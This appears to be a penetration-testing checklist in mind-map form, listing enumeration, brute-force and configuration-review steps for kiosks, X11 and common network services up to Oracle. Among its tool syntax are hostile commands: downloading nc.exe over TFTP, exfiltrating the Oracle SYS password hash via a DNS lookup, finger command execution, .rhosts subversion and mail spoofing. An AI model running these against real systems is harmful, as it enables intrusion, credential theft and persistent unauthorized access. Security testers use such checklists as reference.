1. Manual Testing
1.1. Create Batch File (cmd.bat)
1.1.1. 1
1.1.1.1. cmd.exe
1.1.2. 2
1.1.2.1. echo off
1.1.2.2. command
1.1.2.3. echo on
1.2. Host Scripting File (cmd.vbs)
1.2.1. Option Explicit
1.2.2. Dim objShell
1.2.3. Set objShell = CreateObject("WScript.Shell")
1.2.4. objShell.Run "%comspec% /k"
1.2.5. WScript.Quit
1.2.6. alternative functionality
1.2.6.1. objShell.Run "%comspec% /k c: & dir"
1.2.6.2. objShell.Run "%comspec% /k c: & cd temp & dir >temp.txt & notepad temp.txt"
1.2.6.3. objShell.Run "%comspec% /k c: & tftp -i ip_address GET nc.exe" :-)
1.3. iKat
1.3.1. Integrated Kiosk Attack Tool
1.3.1.1. Reconnaissance
1.3.1.2. FileSystem Links
1.3.1.3. Common Dialogs
1.3.1.4. Application Handlers
1.3.1.5. Browser Plugins
1.3.1.6. iKAT Tools
1.4. AT Command - privilege escalation
1.4.1. AT HH:MM /interactive "cmd.exe"
1.4.2. AT HH:MM /interactive %comspec% /k
1.5. Keyboard Shortcuts/ Hotkeys
1.5.1. Ctrl + h – View History
1.5.2. Ctrl + n – New Browser
1.5.3. Shift + Left Click – New Browser
1.5.4. Ctrl + o – Internet Address (browse feature)
1.5.5. Ctrl + p – Print (to file)
1.5.6. Right Click (Shift + F10)
1.5.6.1. Save Image As
1.5.6.2. View Source
1.5.7. F1 – Jump to URL
1.5.8. SHIFT+F1: Local Task List
1.5.9. SHIFT+F2: Toggle Title Bar
1.5.10. SHIFT+F3: Close Remote Application
1.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del
1.5.12. CTRL+F2: Remote Task List
1.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC
1.5.14. ALT+F2: Cycle through programs
1.5.15. ALT+PLUS: Alt+TAB
1.5.16. ALT+MINUS: ALT+SHIFT+TAB
2. inurl:Citrix/AccessPlatform/auth/login.aspx
3. X11 port 6000^ open
3.1. X11 Enumeration
3.1.1. List open windows
3.1.2. Authentication Method
3.1.2.1. Xauth
3.1.2.2. Xhost
3.2. X11 Exploitation
3.2.1. xwd
3.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
3.2.2. Keystrokes
3.2.2.1. Received
3.2.2.2. Transmitted
3.2.3. Screenshots
3.2.4. xhost +
3.3. Examine Configuration Files
3.3.1. /etc/Xn.hosts
3.3.2. /usr/lib/X11/xdm
3.3.3. /usr/lib/X11/xdm/xsession
3.3.4. /usr/lib/X11/xdm/xsession-remote
3.3.5. /usr/lib/X11/xdm/xsession.0
3.3.6. /usr/lib/X11/xdm/xdm-config
3.3.6.1. DisplayManager*authorize:on
4. pwdump [-h][-o][-u][-p] machineName
5. Nabil contributed the AS/400 section.
6. Client Side Security
7. Back end files
7.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf
8. Set objShell = CreateObject("WScript.Shell")
9. Check visible areas for sensitive information.
10. InitialProgram=c:\windows\system32\cmd.exe
11. Pre-Inspection Visit - template
12. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS fingerprinting and identifying the remote applications being served.

OS fingerprinting, or TCP/IP stack fingerprinting, is the process of determining the operating system in use on a remote host by analysing packets received from that host. There are two distinct ways to fingerprint an OS: actively (e.g. nmap) or passively (e.g. scanrand). Passive OS fingerprinting determines the remote OS from the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy: it sends packets to the remote host and waits for a reply (or the lack of one). Different OSes respond differently to certain types of packet (the response is governed by an RFC plus any proprietary behaviour the vendor, notably Microsoft, has enabled within the system), so custom-crafted packets may be sent to tell them apart.

Remote applications being served on a host can be inferred from the open ports on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.
12.1. Default Port Lists
12.1.1. Windows
12.1.2. *nix
12.2. Enumeration tools and techniques - The vast majority can be used generically; however, certain bespoke applications require their own specific toolsets. Default passwords are platform and vendor specific.
12.2.1. General Enumeration Tools
12.2.1.1. nmap
12.2.1.1.1. nmap -n -A -PN -p- -T aggressive -iL nmap.targetlist -oX nmap.syn.results.xml
12.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
12.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
12.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason
12.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list
12.2.1.2. netcat
12.2.1.2.1. nc -v -n IP_Address port
12.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number
12.2.1.3. amap
12.2.1.3.1. amap -bqv 192.168.1.1 80
12.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
12.2.1.4. xprobe2
12.2.1.4.1. xprobe2 192.168.1.1
12.2.1.5. sinfp
12.2.1.5.1. ./sinfp.pl -i -p
12.2.1.6. nbtscan
12.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)
12.2.1.7. hping
12.2.1.7.1. hping ip_address
12.2.1.8. scanrand
12.2.1.8.1. scanrand ip_address:all
12.2.1.9. unicornscan
12.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E
12.2.1.10. netenum
12.2.1.10.1. netenum network/netmask timeout
12.2.1.11. fping
12.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)
12.2.2. Firewall Specific Tools
12.2.2.1. firewalk
12.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
12.2.2.2. ftester
12.2.2.2.1. host 1: ./ftestd -i eth0 -v; host 2: ./ftest -f ftest.conf -v -d 0.01; then ./freport ftest.log ftestd.log
12.2.3. Default Passwords (Examine list)
12.2.3.1. Passwords A
12.2.3.2. Passwords B
12.2.3.3. Passwords C
12.2.3.4. Passwords D
12.2.3.5. Passwords E
12.2.3.6. Passwords F
12.2.3.7. Passwords G
12.2.3.8. Passwords H
12.2.3.9. Passwords I
12.2.3.10. Passwords J
12.2.3.11. Passwords K
12.2.3.12. Passwords L
12.2.3.13. Passwords M
12.2.3.14. Passwords N
12.2.3.15. Passwords O
12.2.3.16. Passwords P
12.2.3.17. Passwords R
12.2.3.18. Passwords S
12.2.3.19. Passwords T
12.2.3.20. Passwords U
12.2.3.21. Passwords V
12.2.3.22. Passwords W
12.2.3.23. Passwords X
12.2.3.24. Passwords Y
12.2.3.25. Passwords Z
12.2.3.26. Passwords (Numeric)
12.3. Active Hosts
12.3.1. Open TCP Ports
12.3.2. Closed TCP Ports
12.3.3. Open UDP Ports
12.3.4. Closed UDP Ports
12.3.5. Service Probing
12.3.5.1. SMTP Mail Bouncing
12.3.5.2. Banner Grabbing
12.3.5.2.1. Other
12.3.5.2.2. HTTP
12.3.5.2.3. HTTPS
12.3.5.2.4. SMTP
12.3.5.2.5. POP3
12.3.5.2.6. FTP
12.3.6. ICMP Responses
12.3.6.1. Type 3 (Port Unreachable)
12.3.6.2. Type 8 (Echo Request)
12.3.6.3. Type 13 (Timestamp Request)
12.3.6.4. Type 15 (Information Request)
12.3.6.5. Type 17 (Subnet Address Mask Request)
12.3.6.6. Responses from broadcast address
12.3.7. Source Port Scans
12.3.7.1. TCP/UDP 53 (DNS)
12.3.7.2. TCP 20 (FTP Data)
12.3.7.3. TCP 80 (HTTP)
12.3.7.4. TCP/UDP 88 (Kerberos)
12.3.8. Firewall Assessment
12.3.8.1. Firewalk
12.3.8.2. TCP/UDP/ICMP responses
12.3.9. OS Fingerprint
13. Enumeration
13.1. Daytime port 13 open
13.1.1. nmap nse script
13.1.1.1. daytime
13.2. FTP port 21 open
13.2.1. Fingerprint server
13.2.1.1. telnet ip_address 21 (Banner grab)
13.2.1.2. Run command ftp ip_address
13.2.1.3. [email protected]
13.2.1.4. Check for anonymous access
13.2.1.4.1. ftp ip_address (Username: anonymous OR anon; Password: [email protected])
13.2.2. Password guessing
13.2.2.1. Hydra brute force
13.2.2.2. medusa
13.2.2.3. Brutus
13.2.3. Examine configuration files
13.2.3.1. ftpusers
13.2.3.2. ftp.conf
13.2.3.3. proftpd.conf
13.2.4. MiTM
13.2.4.1. pasvagg.pl
13.3. SSH port 22 open
13.3.1. Fingerprint server
13.3.1.1. telnet ip_address 22 (banner grab)
13.3.1.2. scanssh
13.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
13.3.2. Password guessing
13.3.2.1. ssh root@ip_address
13.3.2.2. guess-who
13.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location
13.3.2.3. Hydra brute force
13.3.2.4. brutessh
13.3.2.5. Ruby SSH Bruteforcer
13.3.3. Examine configuration files
13.3.3.1. ssh_config
13.3.3.2. sshd_config
13.3.3.3. authorized_keys
13.3.3.4. ssh_known_hosts
13.3.3.5. .shosts
13.3.4. SSH Client programs
13.3.4.1. tunnelier
13.3.4.2. winsshd
13.3.4.3. putty
13.3.4.4. winscp
13.4. Telnet port 23 open
13.4.1. Fingerprint server
13.4.1.1. telnet ip_address
13.4.1.1.1. Common Banner List (OS / Banner)
13.4.1.1.1.1. Solaris 8 / SunOS 5.8
13.4.1.1.1.2. Solaris 2.6 / SunOS 5.6
13.4.1.1.1.3. Solaris 2.4 or 2.5.1 / Unix(r) System V Release 4.0 (hostname)
13.4.1.1.1.4. SunOS 4.1.x / SunOS Unix (hostname)
13.4.1.1.1.5. FreeBSD / FreeBSD/i386 (hostname) (ttyp1)
13.4.1.1.1.6. NetBSD / NetBSD/i386 (hostname) (ttyp1)
13.4.1.1.1.7. OpenBSD / OpenBSD/i386 (hostname) (ttyp1)
13.4.1.1.1.8. Red Hat 8.0 / Red Hat Linux release 8.0 (Psyche)
13.4.1.1.1.9. Debian 3.0 / Debian GNU/Linux 3.0 hostname
13.4.1.1.1.10. SGI IRIX 6.x / IRIX (hostname)
13.4.1.1.1.11. IBM AIX 4.1.x / AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.
13.4.1.1.1.12. IBM AIX 4.2.x or 4.3.x / AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.
13.4.1.1.1.13. Nokia IPSO / IPSO (hostname) (ttyp0)
13.4.1.1.1.14. Cisco IOS / User Access Verification
13.4.1.1.1.15. Livingston ComOS / ComOS - Livingston PortMaster
13.4.1.2. telnetfp
13.4.2. Password Attack
13.4.2.2. Brutus
13.4.2.3. Hydra brute force
13.4.2.4. telnet -l "-froot" hostname (Solaris 10+)
13.4.3. Examine configuration files
13.4.3.1. /etc/xinetd.d/telnet
13.4.3.2. /etc/xinetd.d/stelnet
13.5. Sendmail Port 25 open
13.5.1. Fingerprint server
13.5.1.1. telnet ip_address 25 (banner grab)
13.5.2. Mail Server Testing
13.5.2.1. Enumerate users
13.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)
13.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)
13.5.2.2. Mail Spoof Test
13.5.2.2.1. HELO anything
13.5.2.2.2. MAIL FROM: spoofed_address
13.5.2.2.3. RCPT TO: valid_mail_account
13.5.2.2.4. DATA
13.5.2.2.5. . (a single dot on its own line ends the message body)
13.5.2.2.6. QUIT
13.5.2.3. /etc/inetd.conf
13.5.2.4. Mail Relay Test
13.5.3. Examine Configuration Files
13.5.3.1. sendmail.cf
13.5.3.2. submit.cf
13.6. DNS port 53 open
13.6.1. Fingerprint server/ service
13.6.1.1. host
13.6.1.1.1. host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] name [server]
13.6.1.1.1.1. -v verbose format
13.6.1.1.1.2. -t (query type) Allows a user to specify a record type, e.g. A, NS, or PTR.
13.6.1.1.1.3. -a Same as -t ANY.
13.6.1.1.1.4. -l Zone transfer (if allowed).
13.6.1.1.1.5. -f Save to a specified filename.
13.6.1.2. nslookup
13.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]
13.6.1.3. dig
13.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
13.6.1.4. whois
13.6.1.4.1. -h Use the named host to resolve the query
13.6.1.4.2. -a Use ARIN to resolve the query
13.6.1.4.3. -r Use RIPE to resolve the query
13.6.1.4.4. -p Use APNIC to resolve the query
13.6.1.4.5. -Q Perform a quick lookup
13.6.2. DNS Enumeration
13.6.2.1. Bile Suite
13.6.2.1.1. perl BiLE.pl [website] [project_name]
13.6.2.1.2. perl BiLE-weigh.pl [website] [input file]
13.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
13.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]
13.6.2.1.5. perl exp-tld.pl [input file] [output file]
13.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
13.6.2.1.7. perl jarf-rev [subnetblock] [nameserver]
13.6.2.2. txdns
13.6.2.2.1. txdns -rt -t domain_name
13.6.2.2.2. txdns -x 50 -bb domain_name
13.6.2.3. nmap nse scripts
13.6.2.3.1. dns-random-srcport
13.6.2.3.2. dns-random-txid
13.6.2.3.3. dns-recursion
13.6.2.3.4. dns-zone-transfer
13.6.3. Examine Configuration Files
13.6.3.1. host.conf
13.6.3.2. resolv.conf
13.6.3.3. named.conf
13.7. perl qtrace.pl [ip_address_file] [output_file]
13.8. TFTP port 69 open
13.8.1. TFTP Enumeration
13.8.1.1. tftp ip_address PUT local_file
13.8.1.2. tftp ip_address GET conf.txt (or other files)
13.8.1.3. Solarwinds TFTP server
13.8.1.4. tftp -i <IP> GET /etc/passwd (old Solaris)
13.8.2. TFTP Bruteforcing
13.8.2.1. TFTP bruteforcer
13.8.2.2. Cisco-Torch
13.9. Finger Port 79 open
13.9.1. User enumeration
13.9.1.1. finger 'a b c d e f g h' @example.com
13.9.1.2. finger [email protected]
13.9.1.3. finger [email protected]
13.9.1.4. finger [email protected]
13.9.1.5. finger [email protected]
13.9.1.6. finger **@example.com
13.9.1.7. finger [email protected]
13.9.1.8. finger @example.com
13.9.1.9. nmap nse script
13.9.1.9.1. finger
13.9.2. Command execution
13.9.2.1. finger "|/bin/[email protected]"
13.9.2.2. finger "|/bin/ls -a /@example.com"
13.9.3. Finger Bounce
13.9.3.1. finger user@host@victim
13.9.3.2. finger @internal@external
13.10. Web Ports 80,8080 etc. open
13.10.1. Fingerprint server
13.10.1.1. Telnet ip_address port
13.10.1.2. Firefox plugins
13.10.1.2.1. All
13.10.1.2.2. Specific
13.10.2. Crawl website
13.10.2.1. lynx [options] startfile/URL (options include -traversal, -crawl, -dump, -image_links, -source)
13.10.2.2. httprint
13.10.2.3. Metagoofil
13.10.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
13.10.3. Web Directory enumeration
13.10.3.1. Nikto
13.10.3.1.1. nikto [-h target] [options]
13.10.3.2. DirBuster
13.10.3.3. Wikto
13.10.3.4. Goolag Scanner
13.10.4. Vulnerability Assessment
13.10.4.1. Manual Tests
13.10.4.1.1. Default Passwords
13.10.4.1.2. Install Backdoors
13.10.4.1.3. Method Testing
13.10.4.1.4. Upload Files
13.10.4.1.5. View Page Source
13.10.4.1.6. Input Validation Checks
13.10.4.1.7. Automated table and column iteration
13.10.4.2. Vulnerability Scanners
13.10.4.2.1. Acunetix
13.10.4.2.2. Grendelscan
13.10.4.2.3. NStealth
13.10.4.2.4. Obiwan III
13.10.4.2.5. w3af
13.10.4.3. Specific Applications/ Server Tools
13.10.4.3.1. Domino
13.10.4.3.2. Joomla
13.10.4.3.3. aspaudit.pl
13.10.4.3.4. Vbulletin
13.10.4.3.5. ZyXel
13.10.5. Proxy Testing
13.10.5.1. Burpsuite
13.10.5.2. Crowbar
13.10.5.3. Interceptor
13.10.5.4. Paros
13.10.5.5. Requester Raw
13.10.5.6. Suru
13.10.5.7. WebScarab
13.10.6. Examine configuration files
13.10.6.1. Generic
13.10.6.1.1. Examine httpd.conf/ windows config files
13.10.6.2. JBoss
13.10.6.2.1. JMX Console http://<IP>:8080/jmx-console/
13.10.6.3. Joomla
13.10.6.3.1. configuration.php
13.10.6.3.2. diagnostics.php
13.10.6.3.3. joomla.inc.php
13.10.6.3.4. config.inc.php
13.10.6.4. Mambo
13.10.6.4.1. configuration.php
13.10.6.4.2. config.inc.php
13.10.6.5. Wordpress
13.10.6.5.1. setup-config.php
13.10.6.5.2. wp-config.php
13.10.6.6. ZyXel
13.10.6.6.1. /WAN.html (contains PPPoE ISP password)
13.10.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)
13.10.6.6.3. /rpDyDNS.html (contains DDNS credentials)
13.10.6.6.4. /Firewall_DefPolicy.html (Firewall)
13.10.6.6.5. /CF_Keyword.html (Content Filter)
13.10.6.6.6. /RemMagWWW.html (Remote MGMT)
13.10.6.6.7. /rpSysAdmin.html (System)
13.10.6.6.8. /LAN_IP.html (LAN)
13.10.6.6.9. /NAT_General.html (NAT)
13.10.6.6.10. /ViewLog.html (Logs)
13.10.6.6.11. /rpFWUpload.html (Tools)
13.10.6.6.12. /DiagGeneral.html (Diagnostic)
13.10.6.6.13. /RemMagSNMP.html (SNMP Passwords)
13.10.6.6.14. /LAN_ClientList.html (Current DHCP Leases)
13.10.6.6.15. Config Backups
13.10.7. Examine web server logs
13.10.7.1. c:\winnt\system32\Logfiles\W3SVC1
13.10.7.1.1. awk -F " " '{print $3,$11}' filename | sort | uniq
13.10.8. References
13.10.8.1. White Papers
13.10.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
13.10.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
13.10.8.1.3. Blind Security Testing - An Evolutionary Approach
13.10.8.1.4. Command Injection in XML Signatures and Encryption
13.10.8.1.5. Input Validation Cheat Sheet
13.10.8.1.6. SQL Injection Cheat Sheet
13.10.8.2. Books
13.10.8.2.1. Hacking Exposed Web 2.0
13.10.8.2.2. Hacking Exposed Web Applications
13.10.8.2.3. The Web Application Hacker's Handbook
13.10.9. Exploit Frameworks
13.10.9.1. Brute-force Tools
13.10.9.1.1. Acunetix
13.10.9.2. Metasploit
13.10.9.3. w3af
13.11. Portmapper port 111 open
13.11.1. rpcdump.py
13.11.1.1. rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
13.11.2. rpcinfo
13.11.2.1. rpcinfo [options] IP_Address
13.12. NTP Port 123 open
13.12.1. NTP Enumeration
13.12.1.1. ntpdc -c monlist IP_ADDRESS
13.12.1.2. ntpdc -c sysinfo IP_ADDRESS
13.12.1.3. ntpq
13.12.1.3.1. host
13.12.1.3.2. hostname
13.12.1.3.3. ntpversion
13.12.1.3.4. readlist
13.12.1.3.5. version
13.12.2. Examine configuration files
13.12.2.1. ntp.conf
13.12.3. nmap nse script
13.12.3.1. ntp-info
13.13. NetBIOS Ports 135-139,445 open
13.13.1. NetBIOS enumeration
13.13.1.1. Enum
13.13.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
13.13.1.2. Null Session
13.13.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""
13.13.1.3. Smbclient
13.13.1.3.1. smbclient -L //server/share password options
13.13.1.4. Superscan
13.13.1.4.1. Enumeration tab.
13.13.1.5. user2sid/sid2user
13.13.1.6. Winfo
13.13.2. NetBIOS brute force
13.13.2.1. Hydra
13.13.2.2. Brutus
13.13.2.3. Cain & Abel
13.13.2.4. getacct
13.13.2.5. NAT (NetBIOS Auditing Tool)
13.13.3. Examine Configuration Files
13.13.3.1. Smb.conf
13.13.3.2. lmhosts
13.14. SNMP port 161 open
13.14.1. Default Community Strings
13.14.1.1. public
13.14.1.2. private
13.14.1.3. cisco
13.14.1.3.1. cable-docsis
13.14.1.3.2. ILMI
13.14.2. MIB enumeration
13.14.2.1. Windows NT
13.14.2.1.1. .1.3.6.1.2.1.1.5 Hostnames
13.14.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name
13.14.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames
13.14.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
13.14.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information
13.14.2.2. Solarwinds MIB walk
13.14.2.3. Getif
13.14.2.4. snmpwalk
13.14.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>
13.14.2.5. Snscan
13.14.2.6. Applications
13.14.2.6.1. ZyXel
13.14.2.7. nmap nse script
13.14.2.7.1. snmp-sysdescr
13.14.3. SNMP Bruteforce
13.14.3.1. onesixtyone
13.14.3.1.1. onesixtyone -c SNMP.wordlist <IP>
13.14.3.2. cat
13.14.3.2.1. ./cat -h <IP> -w SNMP.wordlist
13.14.3.3. Solarwinds SNMP Brute Force
13.14.3.4. ADMsnmp
13.14.3.5. nmap nse script
13.14.3.5.1. snmp-brute
13.14.4. Examine SNMP Configuration files
13.14.4.1. snmp.conf
13.14.4.2. snmpd.conf
13.14.4.3. snmp-config.xml
13.15. LDAP Port 389 Open
13.15.1. ldap enumeration
13.15.1.1. ldapminer
13.15.1.1.1. ldapminer -h ip_address -p port (not required if default) -d
13.15.1.2. luma
13.15.1.2.1. Gui based tool
13.15.1.3. ldp
13.15.1.3.1. Gui based tool
13.15.1.4. openldap
13.15.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
13.15.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
13.15.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
13.15.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
13.15.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
13.15.2. ldap brute force
13.15.2.1. bf_ldap
13.15.2.1.1. bf_ldap -s server -d domain_name -u|-U username|users_list_file -L|-l passwords_list|length_of_passwords_to_generate [-p port] [-v] [-P ldap_user_path]
13.15.2.1.2. Optional: -p port (default 389); -v (verbose mode); -P LDAP user path (default ,CN=Users,)
13.15.2.2. K0ldS
13.15.2.3. LDAP_Brute.pl
13.15.3. Examine Configuration Files
13.15.3.1. General
13.15.3.1.1. containers.ldif
13.15.3.1.2. ldap.cfg
13.15.3.1.3. ldap.conf
13.15.3.1.4. ldap.xml
13.15.3.1.5. ldap-config.xml
13.15.3.1.6. ldap-realm.xml
13.15.3.1.7. slapd.conf
13.15.3.2. IBM SecureWay V3 server
13.15.3.2.1. V3.sas.oc
13.15.3.3. Microsoft Active Directory server
13.15.3.3.1. msadClassesAttrs.ldif
13.15.3.4. Netscape Directory Server 4
13.15.3.4.1. nsslapd.sas_at.conf
13.15.3.4.2. nsslapd.sas_oc.conf
13.15.3.5. OpenLDAP directory server
13.15.3.5.1. slapd.sas_at.conf
13.15.3.5.2. slapd.sas_oc.conf
13.15.3.6. Sun ONE Directory Server 5.1
13.15.3.6.1. 75sas.ldif
13.16. PPTP/L2TP/VPN port 500/1723 open
13.16.1. Enumeration
13.16.1.1. ike-scan
13.16.1.2. ike-probe
13.16.2. Brute-Force
13.16.2.1. ike-crack
13.16.3. Reference Material
13.16.3.1. PSK cracking paper
13.16.3.2. SecurityFocus Infocus
13.16.3.3. Scanning a VPN Implementation
13.17. Modbus port 502 open
13.17.1. modscan
13.18. rlogin port 513 open
13.18.1. Rlogin Enumeration
13.18.1.1. Find the files
13.18.1.1.1. find / -name .rhosts
13.18.1.1.2. locate .rhosts
13.18.1.2. Examine Files
13.18.1.2.1. cat .rhosts
13.18.1.3. Manual Login
13.18.1.3.1. rlogin hostname -l username
13.18.1.3.2. rlogin <IP>
13.18.1.4. Subvert the files
13.18.1.4.1. echo ++ > .rhosts
13.18.2. Rlogin Brute force
13.18.2.1. Hydra
13.19. rsh port 514 open
13.19.1. Rsh Enumeration
13.19.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
13.19.2. Rsh Brute Force
13.19.2.1. rsh-grind
13.19.2.2. Hydra
13.19.2.3. medusa
13.20. SQL Server Port 1433 1434 open
13.20.1. SQL Enumeration
13.20.1.1. piggy
13.20.1.2. SQLPing
13.20.1.2.1. sqlping ip_address/hostname
13.20.1.3. SQLPing2
13.20.1.4. SQLPing3
13.20.1.5. SQLpoke
13.20.1.6. SQL Recon
13.20.1.7. SQLver
13.20.2. SQL Brute Force
13.20.2.1. SQLPAT
13.20.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
13.20.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
13.20.2.2. SQL Dict
13.20.2.3. SQLAT
13.20.2.4. Hydra
13.20.2.5. SQLlhf
13.20.2.6. ForceSQL
13.21. Citrix port 1494 open
13.21.1. Citrix Enumeration
13.21.1.1. Default Domain
13.21.1.2. Published Applications
13.21.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]
13.21.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
13.21.2. Citrix Brute Force
13.21.2.1. bforce.js
13.21.2.2. connect.js
13.21.2.3. Citrix Brute-forcer
13.21.2.4. Reference Material
13.21.2.4.1. Hacking Citrix - the legitimate backdoor
13.21.2.4.2. Hacking Citrix - the forceful way
13.22. Oracle Port 1521 Open
13.22.1. Oracle Enumeration
13.22.1.1. oracsec
13.22.1.2. Repscan
13.22.1.3. Sidguess
13.22.1.4. Scuba
13.22.1.5. DNS/HTTP Enumeration
13.22.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;
13.22.1.6. WinSID
13.22.1.7. Oracle default password list
13.22.1.8. TNSVer
13.22.1.8.1. tnsver host [port]
13.22.1.9. TCP Scan
13.22.1.10. Oracle TNSLSNR
13.22.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
13.22.1.11. TNSCmd
13.22.1.11.1. perl tnscmd.pl -h ip_address
13.22.1.11.2. perl tnscmd.pl version -h ip_address
13.22.1.11.3. perl tnscmd.pl status -h ip_address
13.22.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
13.22.1.12. LSNrCheck
13.22.1.13. Oracle Security Check (needs credentials)
13.22.1.14. OAT
13.22.1.14.1. sh opwg.sh -s ip_address
13.22.1.14.2. opwg.bat -s ip_address
13.22.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
13.22.1.15. OScanner
13.22.1.15.1. sh oscanner.sh -s ip_address
13.22.1.15.2. oscanner.exe -s ip_address
13.22.1.15.3. sh reportviewer.sh oscanner_saved_file.xml
13.22.1.15.4. reportviewer.exe oscanner_saved_file.xml
13.22.1.16. NGS Squirrel for Oracle
13.22.1.17. Service Register
13.22.1.17.1. Service-register.exe ip_address
13.22.1.18. PLSQL Scanner 2008
13.22.2. Oracle Brute Force
13.22.2.1. OAK
13.22.2.1.1. ora-getsid hostname port sid_dictionary_list
13.22.2.1.2. ora-auth-alter-session host port sid username password sql
13.22.2.1.3. ora-brutesid host port start
13.22.2.1.4. ora-pwdbrute host port sid username password-file
13.22.2.1.5. ora-userenum host port sid userlistfile
13.22.2.1.6. ora-ver -e (-f -l -a) host port
13.22.2.2. breakable (Targets Application Server Port)
13.22.2.2.1. breakable.exe host url [port] [v]
13.22.2.2.1.1. host: ip_address of the Oracle Portal Server
13.22.2.2.1.2. url: PATH_INFO, e.g. /pls/orasso
13.22.2.2.1.3. port: TCP port the Oracle Portal Server is serving pages from
13.22.2.2.1.4. v: verbose
13.22.2.3. SQLInjector (Targets Application Server Port)
